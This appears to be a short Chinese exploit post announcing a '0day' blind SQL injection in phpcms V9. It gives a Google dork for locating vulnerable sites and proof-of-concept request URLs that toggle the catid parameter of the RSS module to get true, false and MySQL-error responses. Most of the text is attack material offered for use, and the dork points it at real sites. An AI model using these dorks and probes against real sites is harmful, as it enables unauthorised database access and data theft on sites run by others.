phpcms V9 BLind SQL 注入漏洞0day


    影响版本:phpcms v9 blind
    官方网站:http://www.phpcms.cn
    漏洞类型:SQL注入
    漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。
    google dork:inurl:"index.php?m=content+c=rss+catid=10"
    exploit & p0c
    [!] index.php?m=content&c=rss&catid=[valid catid]
    Example p0c
    [!] http://host/index.php?m=content&c=rss&catid=10 <= True
    [!] http://host/index.php?m=content&c=rss&catid=-10 <= False
    [+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
     
相关文章!